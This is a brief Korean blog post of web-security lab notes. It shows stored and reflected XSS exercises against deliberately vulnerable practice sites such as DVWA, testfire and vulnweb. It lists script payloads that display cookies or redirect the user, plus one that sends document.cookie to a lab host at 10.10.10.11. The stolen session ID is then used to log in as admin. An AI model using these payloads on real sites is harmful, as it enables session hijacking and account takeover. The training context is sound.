웹 보안 실습 2

Posted Nov 17, 2024 Updated Dec 20, 2024

By many

1 min read

XSS (Cross-Site Scripting)

저장형 XSS

1. Acunetix 사이트

URL: http://testphp.vulnweb.com/listproducts.php?cat=1

실습 스크립트:

<script>alert("test")</script>
브라우저에서 “test”라는 경고창 표시
<script>alert(document.cookie);</script>
사용자의 쿠키 값을 경고창으로 표시

2. AltroMutual 사이트

URL: demo.testfire.net

실습 스크립트:

<script>alert("test")</script>
브라우저에서 “test”라는 경고창 표시
<script>alert(document.cookie);</script>
사용자의 쿠키 값을 경고창으로 표시
<script>location.href="http://www.naver.com";</script>
사용자를 네이버 웹사이트로 리다이렉션

3. DVWA 사이트 / Ubuntu Apache2

우분투 아파치 웹 서버 로그 남기기
DVWA에서 실행할 스크립트 작성 <script>document.location='http://10.10.10.11/cookie?'+document.cookie</script?>
DVWA XSS에서 실행 (admin/password 계정)
우분투에서 로그 확인 (SSID)
우분투에서 DVWA 접속 (pablo/letmein 계정)
f12 저장소의 SSID 값을 로그에서 확인한 값으로 변경
새로고침 하면 admin계정으로 접속 됨

반사형 XSS

BWAPP 사이트

세션값 탈취

정보보안, 웹 보안

IT Security Web